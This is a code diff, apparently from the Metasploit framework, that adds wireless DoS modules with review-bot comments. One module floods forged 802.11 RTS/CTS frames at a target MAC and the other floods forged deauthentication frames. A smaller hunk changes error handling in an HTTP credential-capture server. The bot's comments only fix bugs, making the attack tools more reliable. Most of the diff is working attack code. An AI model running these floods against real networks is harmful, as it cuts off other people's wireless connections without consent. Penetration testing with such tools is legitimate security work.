diff --git a/modules/auxiliary/dos/wireless/cts_rts_flood.rb b/modules/auxiliary/dos/wireless/cts_rts_flood.rb
new file mode 100644
index 0000000000..a4a6a709b1
--- /dev/null
+++ b/modules/auxiliary/dos/wireless/cts_rts_flood.rb
@@ -0,0 +1,76 @@
+require 'msf/core'
+
+module Msf
+class Auxiliary::Dos::Wireless::CTSRTSFLOOD < Msf::Auxiliary
+
+ include Exploit::Lorcon
+
+ def initialize(info ={})
+ super(update_info(info,
+ 'Name' => 'Wireless CTS/RTS Flooder',
+ 'Description' => %q{
+ This module sends 802.11 CTS/RTS requests to a specific wireless peer,
+ using the specified source address,
+ },
+
+ 'Author' => [ 'Brad Antoniewicz' ],
+ 'License' => MSF_LICENSE,
+ 'Version' => '$Revision$'
+ ))
+ register_options(
+ [
+ OptString.new('ADDR_DST',[true, "TARGET MAC (e.g 00:DE:AD:BE:EF:00)"]),
+ OptString.new('ADDR_SRC',[false, "Source MAC (not needed for CTS)"]),
+ OptString.new('TYPE',[true,"Type of Frame (RTS, CTS)",'RTS']),
+ OptString.new('NUM',[false, "Number of frames to send",'100'])
+ ],self.class)
+ end
+
+ def run
+ case datastore['TYPE'].upcase
+ when 'RTS'
+ if (!datastore['ADDR_SRC'])
+ print_status("FAILED: RTS Flood selected but ADDR_SRC not set!")
+ return
+ end
+ frame = create_rts()
+ when 'CTS'
+
+ frame =create_cts()
+ else
+ print_status("No TYPE selected!!")
+ return
+ end
+
+ open_wifi
+ print_status("Sending #{datastore['NUM']} #{datastore['TYPE'].upcase} frame.....")
+
+ 0.upto(datastore['NUM'].to_i) do
+ wifi.write(frame)
+ end
+
+ end
+ def create_rts
+
+ frame =
+ "\xb4" + # Type/SubType
+ "\x00" + # Flags
+ "\xff\x7f" + # Duration
+ eton(datastore['ADDR_DST']) + # dst addr
+ eton(datastore['ADDR_SRC']) # src addr
+
+ return frame
+ end
+ def create_cts
+
+ frame =
+ "\xc4" + # Type/SubType
+ "\x00" + # Flags
+ "\xff\x7f" + # Duration
+ eton(datastore['ADDR_DST']) # dst addr
+
+ return frame
+ end
+end
+end
+
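Review bot: `run` in cts_rts_flood.rb calls `open_wifi` but never `close_wifi`, so the injection interface stays open after the module returns; deauth.rb in this same commit does close it, but only on the success path. Wrapping the send loop as `begin ... ensure close_wifi end` in both modules would release the interface even when `wifi.write` raises. The loop `0.upto(datastore['NUM'].to_i)` also runs NUM+1 times while the status line reports NUM, and a non-numeric NUM silently becomes 0 through `to_i`. Registering the option as `OptInt.new('NUM', [false, "Number of frames to send", 100])` and looping with `datastore['NUM'].times do` keeps the count and the message in agreement. The same loop and option definition appear in deauth.rb's `run` and `initialize`.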
diff --git a/modules/auxiliary/dos/wireless/deauth.rb b/modules/auxiliary/dos/wireless/deauth.rb
new file mode 100644
index 0000000000..49956ee947
--- /dev/null
+++ b/modules/auxiliary/dos/wireless/deauth.rb
@@ -0,0 +1,62 @@
+require 'msf/core'
+
+module Msf
+class Auxiliary::Dos::Wireless::DEAUTH_Flood < Msf::Auxiliary
+
+ include Exploit::Lorcon
+
+ def initialize(info ={})
+ super(update_info(info,
+ 'Name' => 'Wireless DEAUTH Flooder',
+ 'Description' => %q{
+ This module sends 802.11 DEAUTH requests to a specific wireless peer,
+ using the specified source address and source BSSID.
+ },
+
+ 'Author' => [ 'Brad Antoniewicz' ],
+ 'License' => MSF_LICENSE,
+ 'Version' => '$Revision$'
+ ))
+ register_options(
+ [
+ OptString.new('ADDR_DST',[true, "TARGET MAC (e.g 00:DE:AD:BE:EF:00)"]),
+ OptString.new('ADDR_SRC',[true, "Source MAC (e.g 00:DE:AD:BE:EF:00)"]),
+ OptString.new('ADDR_BSS',[true, "BSSID (e.g 00:DE:AD:BE:EF:00)"]),
+ OptString.new('NUM',[false, "Number of frames to send",'100'])
+ ],self.class)
+ end
+
+ def run
+
+ print_status("Creating Deauth frame with the following attributes:")
+ print_status("\tDST: #{datastore['ADDR_DST']}")
+ print_status("\tSRC: #{datastore['ADDR_SRC']}")
+ print_status("\tBSSID: #{datastore['ADDR_BSS']}")
+
+ open_wifi
+
+ print_status("Sending #{datastore['NUM']} frames.....")
+
+ 0.upto(datastore['NUM'].to_i) do
+ wifi.write(create_deauth())
+ end
+ close_wifi
+ end
+
+ def create_deauth
+
+ seq = [rand(255)].pack('n')
+ frame =
+ "\xc0" + # Type/SubType
+ "\x00" + # Flags
+ "\x3a\x01" + # Duration
+ eton(datastore['ADDR_DST']) + # dst addr
+ eton(datastore['ADDR_SRC']) + # src addr
+ eton(datastore['ADDR_BSS']) + # BSSID
+ seq + # sequence number
+ "\x07\x00" # Reason Code (nonassoc. sta)
+ return frame
+ end
+end
+end
+
diff --git a/modules/auxiliary/server/capture/http.rb b/modules/auxiliary/server/capture/http.rb
index 941f07a6fb..d3e7b2d70b 100644
--- a/modules/auxiliary/server/capture/http.rb
+++ b/modules/auxiliary/server/capture/http.rb @@ -70,6 +70,7 @@ class Auxiliary::Server::Capture::HTTP < Msf::Auxiliary end def on_client_data(cli) + begin data = cli.get_once(-1, 5) case cli.request.parse(data) @@ -82,12 +83,12 @@ class Auxiliary::Server::Capture::HTTP < Msf::Auxiliary close_client(cli) end rescue ::EOFError, ::Errno::EACCES, ::Errno::ECONNABORTED, ::Errno::ECONNRESET + rescue ::OpenSSL::SSL::SSLError rescue ::Exception print_status("Error: #{$!.class} #{$!} #{$!.backtrace}") end - close_client(cli) - + close_client(cli) end def close_client(cli)
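Review bot: The added `rescue ::OpenSSL::SSL::SSLError` clause in the second http.rb hunk has an empty body, so TLS failures on a client connection are dropped with no trace, while the `rescue ::Exception` below it prints class, message and backtrace. If the silence is intended, a one-line comment such as `# TLS errors from clients are expected here; ignore quietly` would record that; otherwise `print_status("SSL error: #{$!}")` keeps the event visible to the operator. The trailing `close_client(cli)` also follows a path that appears to have already called `close_client(cli)` (first context line of the hunk), so it is worth confirming that `close_client` tolerates a second call for the same client. Its definition starts on the hunk's last line and its body is not visible here.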